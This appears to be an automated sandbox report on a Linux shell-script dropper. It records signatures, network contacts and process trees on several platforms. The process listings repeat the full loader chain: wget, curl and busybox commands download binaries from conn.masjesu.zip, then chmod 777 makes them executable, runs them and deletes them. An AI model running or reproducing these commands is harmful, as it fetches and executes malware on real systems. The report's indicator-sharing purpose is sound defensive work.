Analysis Overview
SHA256
7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e
Threat Level: Shows suspicious behavior
The file 7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
System Network Configuration Discovery
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 06:10
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 06:10
Reported
2024-11-21 06:13
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh
[/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 06:10
Reported
2024-11-21 06:13
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
7s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh
[/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 06:10
Reported
2024-11-21 06:13
Platform
debian9-mipsbe-20240418-en
Max time kernel
87s
Max time network
89s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | N/A |
| N/A | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | N/A |
| N/A | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | N/A |
| N/A | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | N/A |
| N/A | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | N/A |
| N/A | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | N/A |
| N/A | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | N/A |
| N/A | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | N/A |
| N/A | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | N/A |
| N/A | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | N/A |
| N/A | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | N/A |
| N/A | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | N/A |
| N/A | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | N/A |
| N/A | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | N/A |
| N/A | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | N/A |
| N/A | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | N/A |
| N/A | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | N/A |
| N/A | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | N/A |
| N/A | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | N/A |
| N/A | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | N/A |
| N/A | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | N/A |
| N/A | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | N/A |
| N/A | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | N/A |
| N/A | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | N/A |
| N/A | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | N/A |
| N/A | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | N/A |
| N/A | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | N/A |
| N/A | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | /usr/bin/curl | N/A |
Processes
/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh
[/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/chmod
[chmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
[./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/rm
[rm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/chmod
[chmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
[./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/rm
[rm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/chmod
[chmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
[./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/rm
[rm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/chmod
[chmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
[./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/rm
[rm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/chmod
[chmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
[./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/rm
[rm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/chmod
[chmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
[./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/rm
[rm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/chmod
[chmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
[./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/rm
[rm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/chmod
[chmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
[./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/rm
[rm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/chmod
[chmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
[./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/rm
[rm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/chmod
[chmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
[./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/rm
[rm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/chmod
[chmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
[./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/rm
[rm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/chmod
[chmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
[./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/rm
[rm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/chmod
[chmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
[./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/rm
[rm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/chmod
[chmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
[./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/rm
[rm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/chmod
[chmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
[./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/bin/rm
[rm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb]
/usr/bin/wget
